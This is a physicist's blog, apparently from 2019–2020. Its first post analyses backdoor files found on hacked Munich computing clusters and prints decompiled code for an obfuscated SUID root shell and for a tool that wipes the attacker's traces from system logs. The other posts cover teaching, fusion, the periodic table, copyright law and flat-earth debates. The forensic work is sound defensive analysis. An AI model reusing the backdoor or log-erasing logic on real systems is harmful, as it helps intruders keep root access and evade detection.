## Saturday, May 16, 2020

### High Performance Hackers

In the last few days, there was news that several big academic high performance computing centers have been hacked. Here in Munich, the LRZ (Leibniz-Rechenzentrum) was affected, but apparently also computers at the LMU faculty of physics (there are a few clusters in the institute's basement). Word was that it was Linux systems that were compromised and that the attackers left files in /etc/fonts.

I could not resist looking for these files myself, and indeed found them on one of the servers:

helling@hostname:~$ cd /etc/fonts
helling@hostname:/etc/fonts$ ls -la
total 52
drwxr-xr-x   4 root root  4096 Apr  5  2018 .
drwxr-xr-x 140 root root 12288 May 14 10:07 ..
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.avail
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.d
-rwsr-sr-x   1 root root  6256 Apr  5  2018 .fonts
-rw-r--r--   1 root root  2582 Apr  5  2018 fonts.conf
-rwxr-xr-x   1 root root 15136 Apr  5  2018 .low


Uh oh, a dot-file with SUID root?!? I had an evening to spare, so I could finally find out whether I can use some of the forensic tools that are around. As everybody knows, the most important one is "strings". But neither strings .fonts nor strings .low revealed anything interesting about those programs. So we need some heavier lifting. I chose Ghidra (thanks, NSA, for that) as my decompiler.

Let's look at .fonts (the suid one) first. It consists of one central function that I called runbash. Here is what I got after some renaming of symbols:

void runbash(void)

{
  char arguments [4];
  char command [9];
  int i;

  command[0] = 'N';
  command[1] = '\0';
  command[2] = '\n';
  command[3] = '\n';
  command[4] = 'J';
  command[5] = '\x04';
  command[6] = '\x06';
  command[7] = '\x1b';
  command[8] = '\x01';
  i = 0;
  while (i < 9) {
    command[i] = command[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  arguments[0] = '\x03';
  arguments[1] = '\x03';
  arguments[2] = '\x10';
  arguments[3] = '\f';
  i = 0;
  while (i < 4) {
    arguments[i] = arguments[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  setgid(0);
  setuid(0);
  execl(command,arguments,0);
  return;
}


There are two strings, command and arguments, and first there is some XOR-ing with the loop variable going on. I ran that as a separate C program: command ends up as "/bin/bash" and arguments as "bash". So all this program does is start a root shell. And indeed it does (I tried it on the server; of course it has been removed since then).

The second program, .low, is a bit longer. It has a main function that mostly deals with command line options; depending on those, it calls one of three functions that I named machmitfile(), machshitmitfile() and writezerosinfile(), which all take a file name as argument and modify that file by removing lines, overwriting data with zeros, or doing some other rewriting that I did not analyse in detail:

/* WARNING: Could not reconcile some variable overlaps */

ulong main(int argc, char **argv)

{
  char *__s1;
  char *pcVar1;
  bool opbh;
  bool optw;
  bool optb;
  bool optl;
  bool optm;
  bool opts;
  bool opta;
  int numberarg;
  char uitistgleich[40];
  char *local_68;
  char opt;
  uint local_18;
  uint retval;
  char *filename;

  scramble(&UTMP, 0xd);
  scramble(&WTMP, 0xd);
  scramble(&BTMP, 0xd);
  scramble(&LASTLOG, 0x10);
  scramble(&MESSAGES, 0x11);
  scramble(&SECURE, 0xf);
  scramble(&WARN, 0xd);
  scramble(&DEBUG, 0xe);
  scramble(&AUDIT0, 0x18);
  scramble(&AUDIT1, 0x1a);
  scramble(&AUDIT2, 0x1a);
  scramble(&AUTHLOG, 0x11);
  scramble(&HISTORY, 0x1b);
  scramble(&AUTHPRIV, 0x11);
  scramble(&DEAMONLOG, 0x13);
  scramble(&SYSLOG, 0xf);
  scramble(&ACHTdPROZENTs, 7);
  scramble(&OPTOPTS, 0xb);
  scramble(&UIDISPROZD, 7);
  scramble(&ERRORARGSEXIT, 0x11);
  scramble(&ROOT, 4);
  filename = (char *)0x0;
  local_18 = 0;
  opbh = false;
  optw = false;
  optb = false;
  optl = false;
  optm = false;
  opts = false;
  opta = false;
  now = time((time_t *)0x0);
  while (_opt = getopt(argc, argv, &OPTOPTS), _opt != -1) {
    switch (_opt) {
    case 0x61:
      opta = true;
      break;
    case 0x62:
      optb = true;
      break;
    default:
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    case 0x66:
      filename = optarg;
      break;
    case 0x68:
      opbh = true;
      break;
    case 0x6c:
      optl = true;
      break;
    case 0x6d:
      optm = true;
      break;
    case 0x73:
      opts = true;
      break;
    case 0x74:
      local_18 = 1;
      numberarg = atoi(optarg);
      if (numberarg != 0) {
        numberarg = atoi(optarg);
        now = (time_t)numberarg;
        if ((0 < now) && (now < 0x834)) {
          now = settime();
        }
      }
      break;
    case 0x77:
      optw = true;
    }
  }
  if (((((!opbh) && (!optw)) && (!optb)) && ((!optl && (!optm)))) && ((!opts && (!opta)))) {
    printmessage();
  }
  if (opbh) {
    if (argc <= optind + 1) {
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (filename == (char *)0x0) {
      filename = &UTMP;
    }
    retval = machmitfile(filename, argv[optind], argv[(long)optind + 1], (ulong)local_18);
  } else {
    if (optw) {
      if (argc <= optind + 1) {
        printmessage();
        /* WARNING: Subroutine does not return */
        exit(1);
      }
      if (filename == (char *)0x0) {
        filename = &WTMP;
      }
      retval = machmitfile(filename, argv[optind], argv[(long)optind + 1], (ulong)local_18);
    } else {
      if (optb) {
        if (argc <= optind + 1) {
          printmessage();
          /* WARNING: Subroutine does not return */
          exit(1);
        }
        if (filename == (char *)0x0) {
          filename = &BTMP;
        }
        retval = machmitfile(filename, argv[optind], argv[(long)optind + 1], (ulong)local_18);
      } else {
        if (optl) {
          if (argc <= optind) {
            printmessage();
            /* WARNING: Subroutine does not return */
            exit(1);
          }
          if (filename == (char *)0x0) {
            filename = &LASTLOG;
          }
          retval = writezerosinfile(filename, argv[optind], argv[optind]);
        } else {
          if (optm) {
            if (argc <= optind + 3) {
              printmessage();
              /* WARNING: Subroutine does not return */
              exit(1);
            }
            if (filename == (char *)0x0) {
              filename = &LASTLOG;
            }
            retval = FUN_00401bb0(filename, argv[optind], argv[(long)optind + 1],
                                  argv[(long)optind + 2], argv[(long)optind + 3]);
          } else {
            if (opts) {
              if (argc <= optind) {
                printmessage();
                /* WARNING: Subroutine does not return */
                exit(1);
              }
              local_68 = argv[optind];
              if (filename == (char *)0x0) {
                printmessage();
              } else {
                retval = machshitmitfile(filename, local_68, (ulong)local_18, local_68);
              }
            } else {
              if (opta) {
                if (argc <= optind + 1) {
                  printmessage();
                  /* WARNING: Subroutine does not return */
                  exit(1);
                }
                __s1 = argv[optind];
                pcVar1 = argv[(long)optind + 1];
                numberarg = strcmp(__s1, &ROOT);
                if (numberarg == 0) {
                  local_18 = 1;
                }
                machmitfile(&WTMP, __s1, pcVar1, (ulong)local_18);
                machmitfile(&UTMP, __s1, pcVar1, (ulong)local_18);
                machmitfile(&BTMP, __s1, pcVar1, (ulong)local_18);
                writezerosinfile(&LASTLOG, __s1, __s1);
                machshitmitfile(&MESSAGES, __s1, (ulong)local_18, __s1);
                machshitmitfile(&MESSAGES, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&SECURE, __s1, (ulong)local_18, __s1);
                machshitmitfile(&SECURE, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&AUTHPRIV, __s1, (ulong)local_18, __s1);
                machshitmitfile(&AUTHPRIV, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&DEAMONLOG, __s1, (ulong)local_18, __s1);
                machshitmitfile(&DEAMONLOG, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&SYSLOG, __s1, (ulong)local_18, __s1);
                machshitmitfile(&SYSLOG, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&WARN, __s1, (ulong)local_18, __s1);
                machshitmitfile(&WARN, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&DEBUG, __s1, (ulong)local_18, __s1);
                machshitmitfile(&DEBUG, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&AUDIT0, __s1, (ulong)local_18, __s1);
                machshitmitfile(&AUDIT0, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&AUDIT1, __s1, (ulong)local_18, __s1);
                machshitmitfile(&AUDIT1, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&AUDIT2, __s1, (ulong)local_18, __s1);
                machshitmitfile(&AUDIT2, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&AUTHLOG, __s1, (ulong)local_18, __s1);
                machshitmitfile(&AUTHLOG, pcVar1, (ulong)local_18, pcVar1);
                machshitmitfile(&HISTORY, __s1, (ulong)local_18, __s1);
                retval = machshitmitfile(&HISTORY, pcVar1, (ulong)local_18, pcVar1);
                if (password != (passwd *)0x0) {
                  sprintf(uitistgleich, &UIDISPROZD, (ulong)password->pw_uid);
                  machshitmitfile(&SECURE, uitistgleich, (ulong)local_18, uitistgleich);
                  machshitmitfile(&AUDIT0, uitistgleich, (ulong)local_18, uitistgleich);
                  machshitmitfile(&AUDIT1, uitistgleich, (ulong)local_18, uitistgleich);
                  retval = machshitmitfile(&AUDIT2, uitistgleich, (ulong)local_18, uitistgleich);
                }
              }
            }
          }
        }
      }
    }
  }
  return (ulong)retval;
}


But what are the file names? They sit in memory locations that are pre-initialized at startup, but remember, strings did not show anything interesting. That is because, before anything else, a function scramble() is called on them:

void scramble(char *p,int count)

{
  int m;
  int i;

  if (0 < count) {
    m = count * 0x8249;
    i = 0;
    while (m = (m + 0x39ef) % 0x52c7, i < count) {
      p[i] = (byte)m ^ p[i];
      m = m * 0x8249;
      i = i + 1;
    }
  }
  return;
}


As you can see, once more there is some XOR-ing going on to hide the ASCII file names. So, once more, I put the initial data as well as this function in a separate C program, and it produced:

603130: /var/run/utmp
60313e: /var/log/wtmp
60314c: /var/log/btmp
603160: /var/log/lastlog
603180: /var/log/messages
6031a0: /var/log/secure
6031b0: /var/log/warn
6031be: /var/log/debug
6031d0: /var/log/audit/audit.log
6031f0: /var/log/audit/audit.log.1
603210: /var/log/audit/audit.log.2
603230: /var/log/auth.log
603250: /var/log/ConsoleKit/history
603270: /var/log/authpriv
603290: /var/log/daemon.log
6032b0: /var/log/syslog


Ah, these are the log files from which you would want to remove your traces.

This is how far my analysis goes. In case you want to look at this yourself, I have put everything (both binaries, the Ghidra file, my separate C program) in a tarball for you to download.

What all this does not show: How did the attackers get in in the first place (possibly by stealing some user's private keys from another compromised machine), how did they escalate privileges to be able to plant a suid-root file, and for how long have they been around? As you can see above, the files have a timestamp from over two years ago. But once you are root, you can of course set this to whatever you want. It is just not clear why you would want to backdate your backdoor. I should stress that I am only a normal user on that server, so for example I don't have access to the backups to check whether these files have really been around for that long.

Furthermore, the things I found are not very sophisticated. Yes, they prevented me from finding out what's going on with strings by obfuscating their strings. But the rest was so straightforward that even an amateur like myself, with a bit of decompiling, could figure out what is going on. Plus, leaving your backdoor as a suid program lying around in the file system in plain sight is not very stealthy (though possibly enough to go undetected for more than two years). So unless these two files were planted explicitly in order to be found, the attacker does not seem to be the most subtle one.

Which leaves the question of the attackers' motivation. Was it only for sport (bringing some thousand CPUs under their control)? Was it for bitcoin mining (the most direct way to turn this advantage into material gain)? Or did they try to steal data or files?

If you have an account on one of the affected machines (in our case that would be anybody with a physics account at LMU, as at least one affected machine had your home directory mounted), you should revoke all secret keys that were stored there (GPG or ssh; in the latter case that means in particular deleting the corresponding public keys from .ssh/authorized_keys and .ssh/authorized_keys2 everywhere, not just on the affected machines). And you should consider all data on those machines compromised (whatever consequences that might have for you). If attackers had access to your ssh private keys, they may just as well be on all machines that those keys allow logging into without entering further passwords/passphrases/OTPs.

## Friday, April 10, 2020

### Please comment: Should online teaching be public?

I write this post because I am genuinely interested in people's opinions. So please comment even if you usually wouldn't, and it's ok to simply say you agree with somebody's opinion (or not). And of course you can do this anonymously or under a pseudonym.

The question is: What is the right balance between participants' privacy and making things public in the name of public knowledge? Let me explain.

In these times where everybody has to stay at home and the summer semester is only one week away, everybody is busy planning how to run university teaching over the internet. And personally, I am quite optimistic. It's not the real thing, but essentially all the tools are there, and I see this as a chance to try out new things and experiment, while everybody will tolerate it if things are not perfect, at least as long as you are honestly trying. Maybe this way we can bring the university into the 21st century. And yes, some things would work better with more preparation and planning, but without the current urgency, inertia might have kept many things from happening at all.

This summer, together with Sabine Jansen from the math department, I will once more teach the TMP core module "Mathematical Statistical Physics" as the physicist on the stage. At least in my interpretation, this course is mainly about how to honestly deal with systems with infinitely many degrees of freedom and understand the choices you have to make when handling them which then lead to phenomena like phase transitions, coexistence of phases and spontaneous symmetry breaking. I will mainly discuss the quantum part of the story using tools from the algebraic approach where the central objects are KMS states. I recorded a trailer video:

Regarding tools, I will pretty much do what Clifford suggested: use Zoom for the lectures, where I share the screen of my iPad while writing on it like a notepad, doing pretty much what I would have done on a blackboard while talking, and people can see my face. I plan to do this live so there can be questions, feedback and discussions, both for the benefit of the participants asking questions and for me, trying not to talk completely over people's heads or bore everybody to death. In addition, there will be a Moodle for handling exercise sheets, a forum and a chat, as well as tutorials (also via Zoom). And, and this is the point of this post: I want to record the Zoom sessions of the lectures and make those available for later consumption.

And here is the thing: I strongly believe in the principle that knowledge and information are the one commodity that does not get smaller by being shared. If everybody contributes a little bit, this allows us as a community to build huge things. This idea is, for example, behind open source software and Wikipedia and has proven very successful in building many things from which everybody can benefit a lot.

In this spirit, my impulse is that of course the recorded lectures should be available to everybody on the internet. And yes, I would love to see other people's lectures as well, most of which will of course be much better than my own. I think this is particularly true for an advanced course like ours, which is unlike the millionth electrodynamics course that every physics department in the world teaches every year. I hope our content might be interesting to many people around the world, many of whom would not have access to local lectures about it.

And yes, I am not super prepared for this course. I will make mistakes, say wrong things and make a fool of myself. But even then, I think it's worth it. Of course, I am in a privileged situation: I cannot see myself job hunting in the foreseeable future; I am very much settled. So my risk is mainly that everybody can see how stupid I am. But that's it. And to be honest, I rather expect that if there is any effect at all, it will be to my advantage, because there is hope that one or two people might think we are teaching interesting stuff.

But there is a concern that this might not be the same for everybody. Remember, the idea of live teaching rather than pre-recording everything is to allow for interaction with the audience. And the way Zoom recordings work, those reactions are recorded as well. Participants can choose other names and turn off their cameras. But any question (clever or stupid) that anybody asks will be recorded nevertheless. And people might be concerned about this. The fact that the whole world can later hear them asking what somebody might consider a stupid question might prevent them from asking the question at all. This all while my main concern should be the benefit of my own students rather than myself becoming an internet celebrity.

I would like to take into account that the benefit is not only about having my lectures available (that benefit is likely very, very small). What I am talking about is establishing a culture that in the long run makes many people's lectures available. And those are much more likely to be useful to many. While contemplating this in the example of my lectures, I imagine that many lecturers might have similar thoughts at the same time (or at least I would like them to). This connects to an idea I talked about in an old post: the apparent possibility of taking advantage of an asymmetric outcome in a prisoner's dilemma might be an illusion.

And what adds to it is that the people who would be hurt most by this are likely those who deserve the most support: timid people, women, minorities.

So, what should I do? From what I have written, you will gather that I am very much in favour of sharing knowledge as much as possible. But I am willing to take concerns into account, actual concerns though, not ones that one can merely imagine someone might have. So please tell me: what do you think? And yes, if you are a timid person, you might be less likely to leave a comment on a public blog. But please consider doing it nevertheless. Do it anonymously. It doesn't hurt. Of course, you can also email me; that, too, can be done anonymously.

## Monday, November 04, 2019

### On Nuclear Fusion (in German)

Florian Freistetter has posed the challenge in his blog to write a generally accessible text on why nuclear fusion works. Here is my attempt (the challenge rules ask for German; what follows is an English rendering):

## Birds of a feather flock together

Water droplets on a surface, fat globules in soup, bubbles in soda (or in a diver's body, see my other blog), and atomic nuclei: what these phenomena have in common is that surface tension plays a decisive role.

Common to all of them is that there is a substance (water, fat, gas, nucleons, i.e. protons and neutrons, the constituents of the atomic nucleus) that prefers to be surrounded by itself rather than by its environment (air, soup (mostly water), soda, or vacuum). In all these examples the substance can arrange itself better when surrounded by its own kind. An interface, on the other hand, costs energy: the interface energy.

To a good approximation, this energy cost is proportional to the area of the interface. If there has to be an interface at all, it is cheapest to keep it as small as possible. Since the amount of substance, and hence its volume, is fixed, a round shape results (a disk or a sphere, depending on whether we are dealing with something two-dimensional like fat globules or three-dimensional like bubbles), which has the smallest surface for that volume (in the two-dimensional case the "surface" is the boundary length, while the "volume" is the area).

But what happens when two droplets, fat globules, bubbles or atomic nuclei come together? When they merge, the combined volume is as large as the two volumes were before. The surface, however, is smaller than the sum of the two surfaces. Hence less interface energy is needed, and the rest of the energy is released. For the soup this is so little that you normally only notice it because the fat globules keep merging into ever bigger ones; for atomic nuclei it is so much (several megaelectronvolts per nucleus) that you can run a fusion power plant or a star on it.

The released energy thus comes from fewer nucleons having an open flank towards the vacuum; it is cheaper for them to lie directly next to each other.

So much for the qualitative picture. But we can easily make it quantitative: the droplet formed by merging two smaller ones must have twice the volume of each original droplet. Since the volume of a three-dimensional body grows with the third power of its diameter, the big droplet does not have twice the diameter of the small droplets; it is larger only by a factor of $2^{1/3}$, the cube root of 2, about 1.26.

The surface, however, grows quadratically with the diameter, so it is larger by a factor of $2^{2/3}$, about 1.59. At the start we had two droplets, hence twice the surface of a small droplet; at the end only 1.59 times that surface. We have therefore gained interface energy worth 0.41 small-droplet surfaces.

Over time, therefore, more and more droplets will merge into a few big drops, since the latter have less total surface towards the air.

It is exactly the same with atomic nuclei. They, too, reduce their total surface towards the vacuum by coming together, and in this merger, or fusion, the corresponding surface energy is released.

For atomic nuclei, however, there are further energy contributions, which become important mainly for big nuclei with many nucleons. They ensure that overly big nuclei, although they have a smaller surface than the sum of their possible fragments, are nevertheless energetically unfavourable, so that there is an energetically optimal nuclear size (if I remember my studies correctly, this is the nucleus of the element iron).

First there is the Pauli exclusion principle, which forbids two nucleons from being in exactly the same state in the nucleus. They must differ in at least one aspect. This can be, for example, their angular momentum (spin) or their "isospin", i.e. whether they are a proton or a neutron. But if they agree in all these aspects, they must at least occupy different energy levels in the nucleus. As further nucleons are added, the lowest energy levels are already occupied, so they have to occupy a higher one (which costs exactly that energy).

Inside the nucleus, however, neutrons and protons can convert into each other (this is beta decay): if, say, a neutron is added and would have to occupy a high neutron energy level, it can convert into a proton, provided a cheaper proton level is still free (it emits an electron and an antineutrino so that the charge balance works out, too). This gives an energy contribution that depends separately on the proton and neutron numbers and becomes more expensive the bigger the nucleus is.

A further effect is that the protons are electrically charged and repel the other protons. This also costs energy in the total energy balance of a nucleus, proportional to the square of the proton number (and thus unfavourable for overly big nuclei).

Adding all this up, one sees that for small nuclei you first gain a lot of interface energy by merging them into a bigger one. From a medium nuclear size onwards, the other effects start to dominate, and overly big nuclei are again unfavourable, which is why you can also gain energy from nuclear fission, i.e. the splitting up of such oversized nuclei.

## Friday, March 29, 2019

### Proving the Periodic Table

The year 2019 is the International Year of the Periodic Table, celebrating the 150th anniversary of Mendeleev's discovery. This prompts me to report on something that I learned in recent years when co-teaching "Mathematical Quantum Mechanics" with mathematicians, in particular with Heinz Siedentop: We know less about the mathematics of the periodic table than I thought.

In high school chemistry you learned that the periodic table comes about because of the orbitals in atoms. There are the aufbau (Madelung) rules that tell you the order in which you have to fill the shells and, within them, the orbitals (s, p, d, f, ...). Then, in your second semester at university, you learn to derive those using Schrödinger's equation: You diagonalise the Hamiltonian of the hydrogen atom and find the shells in terms of the principal quantum number $n$ and the orbitals in terms of the angular momentum quantum number $L$, where $L=0$ corresponds to s, $L=1$ to p and so on. And you fill the orbitals thanks to the Pauli exclusion principle. So this proves the story of the chemists.

Except that it doesn't: This is only true for the hydrogen atom. But the Hamiltonian for an atom of nuclear charge $Z$ and $N$ electrons (so we allow for ions) is (in convenient units)

$$H = -\sum_{i=1}^N \Delta_i -\sum_{i=1}^N \frac{Z}{|x_i|} + \sum_{i\lt j}^N\frac{1}{|x_i-x_j|}.$$

The story of the previous paragraph would be true if the last term, the Coulomb interaction between the electrons, were not there. In that case, there would be no interaction between the electrons, and we could solve a hydrogen-type problem for each electron separately and anti-symmetrise the wave functions in the end in a Slater determinant to take into account their fermionic nature. But of course, in the real world, the Coulomb interaction is there, and it contributes like $N^2$ to the energy, so it is of the same order (for almost neutral atoms) as the $ZN$ of the electron-nucleus potential.

The approximation of dropping the electron-electron Coulomb interaction is well known in condensed matter systems, where the resulting theory is known as a "Fermi gas". There it gives you band structure (which is then used to explain how a transistor works).

[Figure: band structure in an NPN transistor]
Also in that case, you pretend there is only one electron in the world, which feels the periodic electric potential created by the nuclei and all the other electrons; the latter no longer show up in the wave function but only as a charge density.

For atoms you could try to tell a similar story by taking the inner electrons into account through saying that the most important effect of the ee-Coulomb interaction is to shield the potential of the nucleus, thereby making the effective $Z$ for the outer electrons smaller. This picture would of course be true if there were no correlations between the electrons and if all the inner electrons were spherically symmetric in their distribution around the nucleus and much closer to it than the outer ones. But this sounds more like a daydream than a controlled approximation.

In the condensed matter situation, the standing of the Fermi gas is much better, as there you can invoke renormalisation group arguments: the conductivities you are interested in are at long wavelengths compared to the lattice structure, so we are in the infrared limit, and the Coulomb interaction is indeed an irrelevant term in more than one euclidean dimension (and yes, in 1D the Fermi gas is not the whole story; there is the Luttinger liquid as well).

But for atoms, I don't see how you would invoke such RG arguments.

So what can you do (with regards to actually proving the periodic table)? In our class, we teach how Lieb and Simon showed that in the $N=Z\to \infty$ limit (which in some sense can also be viewed as the semi-classical limit when you bring in $\hbar$ again) the ground state energy $E^Q$ of the Hamiltonian above is in fact approximated by the ground state energy $E^{TF}$ of the Thomas-Fermi model (the simplest of all density functional theories, where instead of the multi-particle wave function you only use the one-particle electronic density $\rho(x)$ and approximate the kinetic energy by a term like $\int \rho^{5/3}$, which is exact for the free Fermi gas in empty space):

$$E^Q(Z) = E^{TF}(Z) + O(Z^2)$$

where by a simple scaling argument $E^{TF}(Z) \sim Z^{7/3}$. More recently, people have computed more terms in this asymptotic expansion, which goes in powers of $Z^{-1/3}$: the second term, $O(Z^{6/3})=O(Z^2)$, is known, and people have put a lot of effort into $O(Z^{5/3})$. But it should be clear that this technology is still very, very far from proving anything "periodic", which would be $O(Z^0)$. So don't hold your breath hoping to find the periodic table from this approach.
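The scaling argument can be spelled out (standard textbook reasoning, not spelled out in the post): writing the Thomas-Fermi functional schematically as

$$\mathcal{E}^{TF}[\rho] = c \int \rho^{5/3}\,dx \;-\; Z\int \frac{\rho(x)}{|x|}\,dx \;+\; \frac12 \iint \frac{\rho(x)\rho(y)}{|x-y|}\,dx\,dy$$

and inserting the trial scaling $\rho(x) = Z^2 \rho_1(Z^{1/3}x)$, each of the three terms picks up exactly a factor of $Z^{7/3}$, which is where $E^{TF}(Z) \sim Z^{7/3}$ comes from.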

On the other hand, chemistry of the periodic table (where the column is supposed to predict chemical properties of the atom expressed in terms of the orbitals of the "valence electrons") works best for small atoms. So, another sensible limit appears to be to keep $N$ small and fixed and only send $Z\to\infty$. Of course this is not really describing atoms but rather highly charged ions.

The advantage of this approach is that in the above Hamiltonian you can absorb the $Z$ of the electron-nucleus interaction into a rescaling of $x$, which then lets $Z$ reappear in front of the electron-electron term as $1/Z$. In this limit, one can then try to treat the ugly unwanted ee-term perturbatively.
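Concretely (my notation, filling in the substitution step): setting $x_i = y_i/Z$ in the Hamiltonian above gives

$$H = Z^2\left( -\sum_{i=1}^N \Delta_i \;-\; \sum_{i=1}^N \frac{1}{|y_i|} \;+\; \frac{1}{Z}\sum_{i\lt j}^N \frac{1}{|y_i-y_j|} \right),$$

so the electron-electron repulsion indeed comes with a prefactor $1/Z$ and is a small perturbation for large $Z$.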

Friesecke (from TUM) and collaborators have made impressive progress in this direction and in this limit they could confirm that for $N < 10$ the chemists' picture is actually correct (with some small corrections). There are very nice slides of a seminar talk by Friesecke on these results.

Of course, as a practitioner, this will not surprise you (after all, chemistry works), but it is nice to know that mathematicians can actually prove things in this direction. Still, there is some way to go even 150 years after Mendeleev.

## Saturday, March 16, 2019

### Nebelkerze CDU-Vorschlag zu "keine Uploadfilter"

Sorry, this is one of the occasional posts about German politics and thus was originally in German. It is my posting to a German-speaking mailing list discussing the upcoming EU copyright directive (which must be stopped in its current form!!! March 23rd is the international protest day); the CDU party has now proposed how to implement it in German law, although so unspecifically that all the problematic details are left out. Here is the post (in English):

Maybe I am too dumb, but I do not see what exactly the progress is compared to what is being discussed at the EU level, except that the CDU proposal is so unspecific that all internal contradictions vanish in the fog. At the EU level, too, the proponents say that one should much rather acquire licenses than filter. That in itself is not new.

What is new, at least in this Handelsblatt article (I have not found it anywhere else), is the mention of hash sums ("digital fingerprint"), or is that supposed to be something more like a digital watermark? That would be a real novelty, but it would immediately strangle the whole procedure at birth, since only the original file would be protected (which would be trivial to detect anyway), while every form of derivative work would fall completely through the cracks, and one could "free" works by a trivial change. Otherwise we are back to the dubious filters based on AI technology that does not exist today.

The other thing is the blanket license. I would then no longer have to conclude contracts with all rights holders, only with a "VG Internet" collecting society. But the big question is again who it is supposed to apply to. Intended, of course, are once more YouTube, Google and FB. But how do you phrase that? This is also the central stumbling block of the EU directive: everybody needs a blanket license unless they are non-commercial (who is, really?), or (younger than three years, with few users and little turnover), or they are Wikipedia, or they are GitHub? That would again be the "the internet is like television, with a few big broadcasters and such, only somehow different" view, as it is so readily propagated by people who look at the internet from a distance. Because it flattens practically everything else. What about forums or photo hosters? Would they all have to acquire a blanket license (which would have to be high enough to cover all film and music rights of the whole world)? What prevents this from ending up as a "whoever runs a service on the internet must first acquire a paid internet license before going online" law, which at any non-trivial license fee would be the end of all grass-roots innovation?

Interessant waere natuerlich auch, wie die Einnahmen der VG Internet verteilt werden. Ein Schelm waere, wenn das nicht in großen Teilen zB bei Presseverlegern landen würde. Das waere doch dann endlich das „nehmt denjenigen, die im Internet Geld verdienen dieses weg und gebt es und, die nicht mehr so viel Geld verdienen“-Gesetz. Dann müsste die Lizenzgebühr am besten ein Prozentsatz des Umsatz sein, am besten also eine Internet-Steuer.

Und ich fange nicht damit an, wozu das führt, wenn alle europäischen Länder so krass ihre eigene Umsetzungssuppe kochen.

Alles in allem ein ziemlich gelungener Coup der CDU, der es schaffen kann, den Kritikern von Artikel 13 in der öffentlichen Meinung den Wind aus den Segeln zu nehmen, indem man es alles in eine inkonkrete Nebelwolke packt, wobei die ganzen problematischen Regelungen in den Details liegen dürften.

## Wednesday, March 06, 2019

### Challenge: How to talk to a flat earther?

Further down the rabbit hole, over lunch I finished watching "Behind the Curve", a Netflix documentary on people who believe the earth is a flat disk. According to them, the north pole is in the center, while Antarctica is an ice wall at the boundary. Sun and moon are much closer, flying above this disk, while the stars are on some huge dome, like in a planetarium. NASA is a fake agency promoting the doctrine, and airlines must be part of the conspiracy, since they know that you cannot fly directly between continents in the southern hemisphere (really?).

These people happily use GPS for navigation but have a general mistrust of at least two centuries of science (and of their teachers).

Besides the obvious "I don't see curvature of the horizon", they are even conducting experiments to prove their point (struggling with laser beams that are not as parallel over miles of distance as they had hoped). So at least some of them might be open to empirical disproof.

So here is my challenge: Which experiment would you conduct with them to convince them? Warning: Everything involving stuff disappearing at the horizon (ships sailing away, being able to see further from a tower) is complicated by non-trivial refraction in the atmosphere, which would very likely render the observation inconclusive. The sun standing at a different altitude (height above the horizon) at different places might also be explained by it being much closer, and a Foucault pendulum might be too indirect to really convince them (plus it requires some non-elementary math to analyse).

My personal solution is to point to the observation that the altitude of Polaris (around which, I hope, they can agree the night sky rotates) is given by the geographical latitude: at the north pole it is right above you, but it has to sink lower the further south you go. I cannot see how this could be reconciled with a dome projection.
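The geometry behind this argument fits in a few lines. What follows is my own toy calculation (not from the post): on a globe, with Polaris effectively at infinity above the pole, its altitude above the horizon equals your latitude; on a flat disk, with Polaris at some assumed finite height over the center, the altitude would be the arctangent of height over distance from the pole, and no single height can match the globe at more than one latitude.

```python
import math

# Toy comparison (my own sketch): predicted altitude of Polaris vs latitude.
# Globe: star at infinity above the pole  =>  altitude = latitude (in degrees).
# Flat disk (azimuthal-equidistant layout): observer at distance
# d = (90 - lat)/360 * circumference from the pole, Polaris at assumed
# height h  =>  altitude = atan(h / d).
R = 6371.0                                 # km; only sets the map scale,
C = 2 * math.pi * R                        # and actually drops out of ratios

def dist_from_pole(lat_deg):
    return (90.0 - lat_deg) / 360.0 * C    # arc length, used as map distance

def flat_altitude(lat_deg, h_km):
    return math.degrees(math.atan2(h_km, dist_from_pole(lat_deg)))

# choose h so the flat model matches observation at latitude 45:
h = dist_from_pole(45.0) * math.tan(math.radians(45.0))

for lat in (10.0, 45.0, 80.0):
    print(lat, round(flat_altitude(lat, h), 1))  # a globe predicts 10, 45, 80
```

Once the height is tuned to match observation at 45° latitude, the disk model predicts roughly 29° instead of 10° near the equator and about 77° instead of 80° far north, a discrepancy anyone with a protractor can check.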

How would you approach this? The rules are that it must only involve observations available to everyone: no spaceflight, no extra high-altitude planes. You are allowed to use phones and cameras, and you can travel (say by car or commercial flight, but you cannot influence the flight route). It must not involve lots of money or higher math.

## Tuesday, February 12, 2019

### Visits to a Bohmian village

Over all of my physics life, I have been under the local influence of some Gaul villages that have ideas about physics that are not 100% aligned with the mainstream views: When I was a student in Hamburg, I was good friends with people working on algebraic quantum field theory. Of course there were opinions that they were the only people seriously working on QFT, as they were proving theorems while others dealt only with perturbative series that are known to diverge and are thus obviously worthless. Funnily enough, they were literally sitting above the HERA tunnel, where electron-proton collisions took place that were very well described by exactly those divergent series. Still, I learned a lot from these people and would say there are few who have thought more deeply about structural properties of quantum physics. These days, I use more and more of these things in my own teaching (in particular in our Mathematical Quantum Mechanics and Mathematical Statistical Physics classes, as well as when thinking about foundations, see below), and even some other physicists are starting to use their language.

Later, as a PhD student at the Albert Einstein Institute in Potsdam, there was an accumulation point of people from the Loop Quantum Gravity community, with Thomas Thiemann and Renate Loll having long-term positions and many others frequently visiting. As you probably know, a bit later I decided (together with Giuseppe Policastro) to look into this more deeply, resulting in a series of papers that were well received, at least amongst our peers, and about which I am still a bit proud.

